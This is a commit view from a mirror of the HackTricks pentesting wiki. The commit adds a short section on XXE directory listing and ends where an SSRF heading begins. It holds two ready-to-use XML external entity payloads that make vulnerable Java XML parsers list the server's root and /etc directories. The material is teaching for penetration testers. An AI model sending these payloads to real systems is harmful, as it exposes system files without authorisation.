Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2021-08-03 11:46:59 +00:00 committed by gitbook-bot
parent 76100d0b06
commit 77754cb2d9
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 12 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
pentesting-web/xxe-xee-xml-external-entity.md
View file

@ -119,6 +119,18 @@ In this third case notice we are declaring the `Element stockCheck` as ANY
![](../.gitbook/assets/image%20%2832%29.png)
### Directory listing
In **java** based applications it might be possible to **list the contents of a directory** via XXE with a payload like:
```markup
<!-- Root / -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE aa[<!ELEMENT bb ANY><!ENTITY xxe SYSTEM "file:///">]><root><foo>&xxe;</foo></root>
<!-- /etc/ -->
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/" >]><root><foo>&xxe;</foo></root>
```
### SSRF
An XXE could also bu used to abuse a SSRF inside a cloud